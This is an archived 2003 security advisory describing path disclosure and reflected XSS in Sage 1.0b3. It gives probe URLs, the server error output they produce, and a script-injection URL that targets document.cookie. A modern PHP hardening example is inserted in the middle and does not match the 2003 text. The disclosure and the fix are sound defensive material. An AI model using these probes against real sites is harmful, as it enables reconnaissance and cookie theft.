XSS and Path Disclosure in Sage

From: euronymous (just-a-userat_private)
Date: Wed Feb 19 2003 - 14:21:47 PST


    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    topic: XSS and Path Disclosure in Sage
    product: Sage 1.0b3
    vendor: http://sage.dev.box.sk/
    risk: middle
    date: 02/20/2k3
    discovered by: euronymous /f0kp /r00tc0de
    advisory urls: http://f0kp.iplus.ru/bz/015.en.txt
                   http://f0kp.iplus.ru/bz/015.ru.txt 
    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    
    
    description
    -----------
    
    1) path disclosure
    
    you can view the full system path in two ways:
    
    http://hostname/?mod=some_thing&op=browse
    
    where `some_thing' is a nonexistent module name
    
    ===================================================
    Fatal error: Cannot instantiate non-existent class: 
    module_some_thing 
    in /home/aztek/libraries/module.inc.php on line 62
    ===================================================
    
    
    the other method is:
    
    http://hostname/?mod=node&nid=some_thing&op=view
    
    ===================================================
    Access Denied 
    /home/aztek/modules/node.module.php:71
    ===================================================
    
    
    2) cross-site scripting
    
    because $mod is not checked correctly, you can insert
    html, javascript, etc. into the script output:
    
    http://hostname/?mod=<script>alert(document.cookie)</script>&op=browse
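Both findings come from the same root cause: the `mod` parameter reaches PHP's class loader and the page output without validation, and PHP's default error display then leaks the filesystem path. The following front controller is an added example written for this advisory, not Sage's own code; the `./modules/<name>.module.php` layout and the `module_<name>` class naming are assumptions modelled on the error messages quoted above, not Sage's actual structure. It fixes item 1 by turning off `display_errors` and replying with a generic message, and item 2 by allow-listing the module name and escaping every user-supplied string before it is echoed.

```php
<?php
// Added example (not Sage's code): hardened handling of the ?mod= / ?op= parameters.
// Assumed layout: modules live in ./modules/<name>.module.php and each file defines
// class module_<name>. Both are placeholders, not Sage's real structure.
declare(strict_types=1);

// 1) Path disclosure: never print raw PHP errors (they carry full paths) to the
//    browser; send them to the server log instead. Both are standard php.ini directives.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

const MODULE_DIR = __DIR__ . '/modules';

/** Allow-list check: short lowercase identifier that maps to an existing module file. */
function valid_module_name(string $mod): bool
{
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $mod)) {
        return false;
    }
    return is_file(MODULE_DIR . '/' . $mod . '.module.php');
}

/** Load a module or fail with a generic message; the details go only to the error log. */
function load_module(string $mod): object
{
    if (!valid_module_name($mod)) {
        // hex-encode so a crafted name cannot inject newlines into the log either
        error_log('rejected module name: ' . bin2hex($mod));
        throw new RuntimeException('Unknown module');
    }
    require_once MODULE_DIR . '/' . $mod . '.module.php';
    $class = 'module_' . $mod;
    if (!class_exists($class)) {
        error_log("module file for $mod defines no class $class");
        throw new RuntimeException('Unknown module');
    }
    return new $class();
}

/** 2) XSS: escape every user-controlled string before it reaches HTML output. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reject non-string input (e.g. ?mod[]=x) instead of letting it become "Array".
$mod = is_string($_GET['mod'] ?? null) ? $_GET['mod'] : 'node';
$op  = is_string($_GET['op'] ?? null) ? $_GET['op'] : 'view';

try {
    $module = load_module($mod);
    // The module would dispatch $op itself; here only the escaped names are shown.
    echo '<p>Module ' . h($mod) . ' ready for operation ' . h($op) . '</p>';
} catch (RuntimeException $e) {
    http_response_code(404);
    // Safe even when $mod is "<script>alert(document.cookie)</script>": the value is
    // escaped, and the message contains no filesystem path.
    echo '<p>' . h($e->getMessage()) . ' (' . h($mod) . ')</p>';
}
```

A request for a nonexistent module now yields `Unknown module (some_thing)` with a 404 and a log entry, instead of the `Fatal error ... /home/aztek/libraries/module.inc.php` shown above, and the XSS request renders the tag text literally because `h()` escapes `<`, `>` and quotes. A defensive check for deployments that cannot patch immediately is to confirm `display_errors` is off in production `php.ini`, which closes the path disclosure even before the input validation is added.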
    
    
    shouts: r00tc0de.net, DWC, DHG, security.nnov.ru, all 
    russian security guyz!! and kate for being a kewl girl ))
    fsck_off: slavomira and other dirty ppl in *.kz
    
    ================
    im not a lame,
    not yet a hacker
    ================
    



    This archive was generated by hypermail 2b30 : Thu Feb 20 2003 - 08:02:47 PST